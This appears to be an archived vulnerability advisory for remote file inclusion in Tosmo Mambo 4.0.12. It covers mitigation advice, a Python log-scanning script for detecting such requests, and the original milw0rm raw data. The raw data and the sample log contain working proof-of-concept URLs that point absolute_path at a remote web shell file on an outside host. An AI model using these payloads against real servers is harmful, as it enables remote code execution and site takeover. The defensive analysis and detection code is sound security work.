Vendor: Tosmo Mambo
By: Cold z3ro
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion (RFI)
Product Name: Tosmo Mambo
Affected Version From: <= 4.0.12
Affected Version To: <= 4.0.12
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Tosmo Mambo <= 4.0.12 (absolute_path) Multiple RFI Vulnerabilities

The scripts listed in the advisory below pass $absolute_path to include()/include_once() without assigning it first. With PHP's register_globals enabled, any request can set that variable through the query string, and with allow_url_include (on older PHP releases, allow_url_fopen) enabled, include() fetches the supplied URL and executes the response as PHP on the server. The proof-of-concept URLs end in '?' so that the fixed remainder of the include path (for example /components/minibb/bb_admin.php) is sent to the attacker's host as a query string instead of being appended to the file name. Because the included code runs with the web server's privileges, this gives an unauthenticated attacker remote code execution and full compromise of the affected system.

Mitigation:

1. Update to a fixed version of Tosmo Mambo if one becomes available (none is recorded here). Until then, assign $absolute_path inside each affected script from the script's own location (dirname(__FILE__), adjusted to the site root) before any include, so the value can never come from the request.
2. Disable register_globals and allow_url_include (and, where possible, allow_url_fopen) in php.ini; with either of the first two off, the include can no longer be pointed at a remote URL through the query string. Validate and sanitize any remaining path input against an allow-list.
3. Regularly monitor and audit the application's logs for requests that carry an absolute_path parameter at all, especially one whose value starts with a URL scheme.
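The following is an added example, not code from the original advisory or from the Tosmo Mambo project: a small Python audit for the log review in mitigation step 3, applied to the attack described above. It assumes combined-format web server access logs; the log lines embedded below are constructed for the example (request paths mirror the advisory's PoC URLs, client addresses are from the RFC 5737 test ranges, and the hostname is the one the advisory uses). Any request that carries absolute_path at all is reported, because the application never sends that parameter itself; the finding is rated high when the value begins with a PHP stream wrapper scheme, and the trailing '?' trick from the PoC, double URL encoding, and the null-byte variant of the same attack class (not shown on this page) are called out in the reason.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined/common log format prefix:
#   client ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Stream wrappers PHP's include() will read from when allow_url_include is On.
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps", "php", "data"}

# Variables the advisory shows being used unvalidated in include paths. The
# application never passes them in a URL; they only become attacker-controlled
# because register_globals turns query parameters into PHP variables.
WATCHED_PARAMS = {"absolute_path"}


def rfi_indicators(target):
    """Inspect one request target ('/path?query') and return a list of
    (param, decoded_value, severity, reason) for every watched parameter."""
    findings = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name not in WATCHED_PARAMS:
            continue
        # parse_qsl decoded once already; decode again so a double-encoded
        # payload (%253A%252F%252F) is still recognised as a URL.
        value = unquote(raw)
        lowered = value.lower()
        scheme = lowered.split(":", 1)[0] if ":" in lowered else ""
        if scheme in REMOTE_SCHEMES:
            reason = "remote include through the %s: wrapper" % scheme
            if value.endswith("?"):
                # The trailing '?' turns the fixed remainder of the include path
                # (e.g. '/components/minibb/bb_admin.php') into a query string for
                # the attacker's server instead of a path component, so the fetch
                # still returns the attacker's file.
                reason += ", trailing '?' swallows the fixed path suffix"
            if "\x00" in value:
                reason += ", embedded null byte"
            findings.append((name, value, "high", reason))
        else:
            findings.append((name, value, "medium",
                             "client-supplied value for a server-side path variable"))
    return findings


def scan_log(lines):
    """Run rfi_indicators over access-log lines; return one dict per finding."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        for name, value, severity, reason in rfi_indicators(m["target"]):
            hits.append({
                "client": m["client"], "time": m["time"], "status": int(m["status"]),
                "target": m["target"], "param": name, "value": value,
                "severity": severity, "reason": reason,
            })
    return hits


# Constructed sample log (not from any real server). The first two requests
# mirror the advisory's PoC URLs; client addresses are RFC 5737 test ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Apr/2007:10:02:11 +0000] "GET /components/com_minibb.php?absolute_path=http://nachrichtenmann.de/r57.txt? HTTP/1.1" 200 5120
203.0.113.7 - - [11/Apr/2007:10:02:14 +0000] "GET /configuration.php?absolute_path=http%3A%2F%2Fnachrichtenmann.de%2Fr57.txt%3F HTTP/1.1" 200 5120
198.51.100.4 - - [11/Apr/2007:10:05:00 +0000] "GET /components/com_minibb.php?absolute_path=/var/www/mambo HTTP/1.1" 200 812
192.0.2.9 - - [11/Apr/2007:10:06:30 +0000] "GET /index.php?option=com_content&task=view&id=3 HTTP/1.1" 200 9001
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print("%-6s %s %s -> %s=%r (%s)" % (hit["severity"].upper(), hit["client"],
              hit["target"], hit["param"], hit["value"], hit["reason"]))
```

Run against a real log, add every other variable the application uses in include paths to WATCHED_PARAMS and treat a high finding with a 200 status as a likely successful inclusion that warrants checking the web root for dropped files. The medium rating for a local path value is deliberate: a client has no business setting the variable at all, and the same register_globals weakness lets it be pointed at local files.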

Exploit-DB raw data:

=======================================================
Tosmo Mambo <= 4.0.12 (absolute_path) Multiple RFI Vulnerabilities
=======================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
=======================================================
Homepage: www.Hack-Teach.com
=======================================================
Script Site :
http://www2.tutorial.hu/letoltes/dl.php?p=/scriptek/joomla/mambo.4.0.x&i=tosmo_mambo.zip
==============================================
File : /components/com_minibb.php
include("$absolute_path/components/minibb/bb_admin.php");
======
/components/com_minibb.php?absolute_path=http://nachrichtenmann.de/r57.txt?

========================================================

File : /components/minibb/bb_plugins.php

<?php
include ($absolute_path.'/components/minibb/hack_smilies.php');
?>
======
/components/minibb/bb_plugins.php?absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_minibb/bb_plugins.php?absolute_path=http://nachrichtenmann.de/r57.txt?
=======================================================

File : configuration.php?absolute_path=http://nachrichtenmann.de/r57.txt?
include_once("$absolute_path/version.php");
======
/configuration.php?absolute_path=http://nachrichtenmann.de/r57.txt?
=======================================================
#Long Life Palestine
#www.Hack-Teach.com

# milw0rm.com [2007-04-11]